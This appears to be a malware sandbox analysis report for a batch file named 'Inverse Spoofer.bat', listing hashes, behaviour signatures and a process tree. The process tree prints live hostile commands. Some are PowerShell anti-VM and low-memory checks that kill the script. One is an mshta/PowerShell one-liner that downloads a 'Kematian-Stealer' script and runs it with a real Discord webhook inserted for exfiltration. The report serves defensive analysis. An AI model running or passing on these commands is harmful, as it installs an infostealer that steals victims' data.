Overview

overview

7

Static

static

1

Inverse Spoofer.bat

windows7-x64

7

Inverse Spoofer.bat

windows10-2004-x64

3

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/05/2024, 19:32

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Inverse Spoofer.bat

  • Size

    3.6MB

  • MD5

    1993658619a8d5ba60491f5b2fb85339

  • SHA1

    2e281ef8074e2bb71c065e515e1f2cdad18f2b65

  • SHA256

    420f833ebca48b057f60204a321a7b5e0500d231d5519834787d0498734bc5de

  • SHA512

    7fccdb7e86d95c01e2f2c0fc872eb99063c1cf6f97ec7a1e30431b31bbd89eebba9ba465e464552b3d587e61ab58ae233d86817f89c117d7f74bfe4d2400f5a2

  • SSDEEP

    6144:yWVEK5u+fJwY/OwIT2dahoPeY13mssMAIsW3lElCConI:yWuKw45jw2Ehn6vsMtLyonI

Score
7/10
execution

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2336
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
        PID:3056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic computersystem get manufacturer /value
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2512
      • C:\Windows\system32\findstr.exe
        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
        2⤵
          PID:2524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2580
        • C:\Windows\system32\findstr.exe
          findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
          2⤵
            PID:2452
          • C:\Windows\system32\findstr.exe
            findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
            2⤵
              PID:2396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2708
            • C:\Windows\system32\findstr.exe
              findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
              2⤵
                PID:1452
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2144
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:2140
                • C:\Windows\system32\findstr.exe
                  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                  2⤵
                    PID:1680
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:604
                  • C:\Windows\system32\findstr.exe
                    findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                    2⤵
                      PID:1928
                    • C:\Windows\system32\findstr.exe
                      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                      2⤵
                        PID:828
                      • C:\Windows\system32\findstr.exe
                        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                        2⤵
                          PID:2160
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2244
                        • C:\Windows\system32\findstr.exe
                          findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                          2⤵
                            PID:328
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1740
                          • C:\Windows\system32\findstr.exe
                            findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                            2⤵
                              PID:2340
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                              2⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1488
                            • C:\Windows\system32\findstr.exe
                              findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                              2⤵
                                PID:820
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                                2⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:280
                              • C:\Windows\system32\findstr.exe
                                findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                                2⤵
                                  PID:568
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2840
                                • C:\Windows\system32\findstr.exe
                                  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                                  2⤵
                                    PID:2948
                                  • C:\Windows\system32\findstr.exe
                                    findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                                    2⤵
                                      PID:1648
                                    • C:\Windows\system32\findstr.exe
                                      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
                                      2⤵
                                        PID:2640
                                      • C:\Windows\system32\doskey.exe
                                        doskey /listsize=0
                                        2⤵
                                          PID:2548
                                        • C:\Windows\system32\net.exe
                                          net session
                                          2⤵
                                            PID:2416
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 session
                                              3⤵
                                                PID:1940
                                            • C:\Windows\system32\mshta.exe
                                              mshta
                                              2⤵
                                                PID:2620
                                              • C:\Windows\system32\mshta.exe
                                                mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1233425449405644874/vNZG29_aqrS5-6_cEZagubWOBE70X-G9ljYRHQhwde6gbqIzouyhYkH-xjXVc7vySWYK' | iex",0))
                                                2⤵
                                                • Modifies Internet Explorer settings
                                                PID:2252
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1233425449405644874/vNZG29_aqrS5-6_cEZagubWOBE70X-G9ljYRHQhwde6gbqIzouyhYkH-xjXVc7vySWYK' | iex
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2436

                                            Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Temp\kdotZhHGF.bat
                                                    Filesize

                                                    13B

                                                    MD5

                                                    337065424ed27284c55b80741f912713

                                                    SHA1

                                                    0e99e1b388ae66a51a8ffeee3448c3509a694db8

                                                    SHA256

                                                    4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b

                                                    SHA512

                                                    d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Temp\kdotZhHGF.bat
                                                    Filesize

                                                    91B

                                                    MD5

                                                    8d39bd87139ebe57d2f1d916e907886b

                                                    SHA1

                                                    b14667ff79adab3b227f1a4fc468aa10320eb88b

                                                    SHA256

                                                    0a46a0ae7013f707b6539f13529a0e706845b23a6c77ec6ddb6d71f9186686e8

                                                    SHA512

                                                    b62ce28dff368a7ec11eac544e66fbbfba27e688ac6cceeda01d7f26e32ed87d814a64a753e9fe1f876a97394a4ca0eaca764a42aaddba881a0a8e29c6f48448

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Temp\kdotmgVbKy.bat
                                                    Filesize

                                                    182B

                                                    MD5

                                                    15ba9773acc628a3d7a219bd5237cf78

                                                    SHA1

                                                    64b395ca9d2d7976a6b0023a09a799163acb7280

                                                    SHA256

                                                    1d07fc24d284d0b8c68f5e995a7b8cf97d94ffc3ec3d203596c236bb40295ae1

                                                    SHA512

                                                    1ba60dcae51a797c7e0d68051673954d4728986789dc98aa935817c5c808389885696e7bd06f01ea885a4eefa62a71a1561bcca53a6b964f240331931c3db9a5

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                    Filesize

                                                    7KB

                                                    MD5

                                                    4d89ff10d87d1c8eaf9033c85a98bde8

                                                    SHA1

                                                    74e1b16b31b00f12a8485455ab5a239aabfbd81b

                                                    SHA256

                                                    8dab4e1908ea7352a2b340cdbc377785e1f4a396ef39ffb909d418db12f28ed1

                                                    SHA512

                                                    08b971f4917ae2bd0c607c05c21216fdb0e9d6791b43381ac7aec568aea541b7868c87be3900a466e3ada7489d6e2c22aed3cfbd0a9c6f56835696a35ab40e7a

                                                    Download Submit

                                                  • memory/2580-31-0x0000000001E34000-0x0000000001E37000-memory.dmp

                                                    Filesize

                                                    12KB

                                                    Download

                                                  • memory/2580-30-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                    Download

                                                  • memory/2580-32-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                    Download

                                                  • memory/2580-29-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                    Download

                                                  • memory/2580-28-0x0000000002350000-0x0000000002358000-memory.dmp

                                                    Filesize

                                                    32KB

                                                    Download

                                                  • memory/2580-27-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

                                                    Filesize

                                                    2.9MB

                                                    Download

                                                  • memory/2580-26-0x000007FEF528E000-0x000007FEF528F000-memory.dmp

                                                    Filesize

                                                    4KB

                                                    Download

                                                  • memory/2708-60-0x000000001B580000-0x000000001B862000-memory.dmp

                                                    Filesize

                                                    2.9MB

                                                    Download

                                                  • memory/2708-61-0x0000000002960000-0x0000000002968000-memory.dmp

                                                    Filesize

                                                    32KB

                                                    Download